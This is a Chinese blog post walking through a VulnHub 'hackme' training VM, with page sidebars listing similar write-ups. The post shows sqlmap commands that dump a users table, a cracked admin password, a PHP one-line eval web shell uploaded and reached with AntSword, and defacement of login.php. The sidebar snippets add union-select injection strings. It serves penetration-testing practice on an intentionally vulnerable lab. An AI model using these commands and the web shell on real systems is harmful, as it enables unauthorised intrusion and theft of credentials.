hackerme-靶机渗透

最新推荐文章于 2024-08-13 08:00:00 发布
最新推荐文章于 2024-08-13 08:00:00 发布
阅读量381 收藏 2
点赞数 13
文章标签: 网络 安全 网络安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53736204/article/details/140770582
版权

hackerme-靶机渗透

一、下载安装靶场

https://download.vulnhub.com/hackme/hackme.ova

靶场搭建

下载好双击写好文件名路径

image-20240729135532843

二、信息收集

1.打开虚拟机进行端口扫描

首先查看ip段然后扫描该虚拟机的IP是哪个

image-20240729114618169

image-20240729114721390

2.登录靶场网站首页

image-20240729114808096

3.注册登录

image-20240729132953669

密码6位以上

image-20240729115940269

单机search有很多书

image-20240729134254546

三、SQL注入

1.判断是否有SQL注入

POST请求方式所以抓包

image-20240729135817582

2.判断出注入点和闭合方式

image-20240729140016189

3.用sqlmap注入,将数据包保存在1.txt中

4.查询数据库

python3 sqlmap.py -r C:\Users\1\Desktop\1.txt --current-db --batch

image-20240729140224629

5.查表

python3 sqlmap.py -r C:\Users\1\Desktop\1.txt --batch -D webapphacking --tables

image-20240729140319492

6.查users表中数据

python3 sqlmap.py -r C:\Users\1\Desktop\1.txt --batch -D webapphacking -T users --dump

image-20240729140428075

7.查出用户表数据,用superadmin登录网站密码要MD5解密:Uncrackable

image-20240729141106214

三、上传木马

1.上传一句话木马

<?php @eval ($_POST['cmd']); ?>

image-20240729141513172

上面显示上传到uploads文件夹里

image-20240729141606625

蚁剑连接

image-20240729142032075

修改网站login.php代码给他加个标题

image-20240729142328244

image-20240729142403361

黑白时光les
关注
靶机渗透 hackme-1(详解,适合新手)
君莫hacker的博客
09-05 6892
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个
HACKME:1靶机
JKding123的博客
10-22 1075
HACKME:1 靶机地址 https://www.vulnhub.com/entry/hackme-1,330/ 靶机IP:192.168.3.142 kaliIP:192.168.3.133 主机发现 root@kali:~# arp-scan -l 端口扫描 开放了80、22端口 目录扫描 root@kali:~/dirsearch# python3 dirsearch.py -u http://192.168.3.142/ -e * 依次访问试试 http://192.168.3.142/lo
HACK ME靶机
qq_49101841的博客
10-01 1242
❀本篇关于信息安全实训时靶场训练的操作笔记。
hackme靶机渗透~SQL注入+文件上传
最新发布
weixin_67832625的博客
08-13 432
本文今天对hackerme这个靶机做了详细的介绍,主要是SQL注入和文件上传漏洞,难度适中,需要我们自习的对漏洞挖掘 ,最后提权的过程,有任何问题随时反馈作者
Hackme-1靶机
zjxxxy的博客
06-12 261
Hackme-1靶场攻略
hackme靶场(getshell)
weixin_65722679的博客
06-21 262
hackme靶场(getshell)
靶机渗透 HACKME-2 (详细渗透,适合新手渗透
君莫hacker的博客
09-06 4186
靶机HACKME:2的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-2,618/ 作者 x4bx54 发布日期 2020年12月6日 难度 中等 靶机基本介绍: hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利
HackerMe:这是黑客记录
03-26
自述文件 这是一个黑客记录。
一、Bugku----flag被盗了------流量分析题------http
qwsn
10-13 2152
一、题目 题目网盘链接:https://pan.baidu.com/s/1ZkRcnz15g9iTQOJ_ti0D0Q 提取码:gnnl 二、解题步骤: 1. 用wireshark打开key.pcapng; 2. 筛选http; 3. 尝试get形式的包,右击,点击追踪流,无结果; 4. 尝试post形式的包,右击,点击追踪流,有结果。 三、flag: flag{This_i...
Hackme靶机渗透
m0_50584370的博客
06-01 303
hackme靶机渗透
靶场-hackeme1
weixin_58602402的博客
06-12 225
1.在/home/legacy路径下发现二进制文件touchmenot,执行二进制文件。Linux OS' order by 1# //正常。Linux OS' order by 4# //不正常。3.编写反弹shell的脚本,shell.py,并利用蚁剑上传并执行。Linux OS' order by 3# //正常。Linux OS' and 1=2 # //不正常。Linux OS' and 1=1 # //正常。7.爆破数据库名,用户名,版本号。
hackme靶场/靶机练习
weixin_69602647的博客
07-29 247
hackme靶场练习
hackme靶场教程
weixin_53198216的博客
07-29 201
1.扫描目录得到靶场地址,进行联合查询得到回显点,查询数据表名。11.打开蚁剑进入地址,看是否可以进行操作。9.抓包过程中,把jpg改为php后放行。5.根据列名得到用户名和密码。6.使用md5解密得到密码。8.上传一个图片马并进行抓包。10.查看木马上传是否成功。3.根据库名得到表名。4.根据表名得到列名。
hackme靶场练习
SYJ_361的博客
03-18 2510
本文对hackme靶场进行练习,运用sql注入漏洞,以及msf木马反弹shell,进而取得root权限
Hackme靶机 保姆级最详细教程!!!
2401_85783544的博客
07-29 569
最后直接dump,把内容下载下来,我们看到了superadmin超级管理员,他的密码是加密状态,进行解密。2.用御剑扫描一下1-255的端口,发现59和60之间出现了一个奇怪的131,我们可以尝试访问一下,发现登录成功说明131就是靶机的地址.4.输入刚才注册的用户名和密码,可以看到登录进来了,我们输入sql注入语句 ' or 1=1 #9.这个时候我们在访问之前的一个上传目录uploads,可以看到我们上传的6.php。8.我们去直接登录,可以看到上传按钮,这个时候上传一个一句话木马。
hackme靶场通关
weixin_56594114的博客
08-02 87
模式子网地址,靶机需要也设置成。显示结果,说明闭合方式是'去扫描全网段查看靶机的。
HACKME-1 打靶
weixin_57315671的博客
06-16 288
8.查看webapphacking库所有的表 -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#9.查看users表中所有的列 -1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
Hackme2靶机总结
qq_45301512的博客
12-17 427
(2) 先用最普通的测post的跑一下,发现不行,根据最后的提示,可以加上 –level 参数 和 –tramper=space2comment 参数。看了网上的答案,发现/home/legacy下存在一个touchmenot可执行文件,运行就能提权。使用msfvenom生成一个php的tiquan.php,上传到/var/www/html目录下。=eval 代替
靶机渗透练习13-hackme1
hirak0的博客
04-15 702
靶机描述 靶机地址:https://www.vulnhub.com/entry/hackme-1,330/ Description ‘hackme’ is a beginner difficulty level box. The goal is to gain limited privilege access via web vulnerabilities and subsequently privilege escalate as root. The lab was created to mimic
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值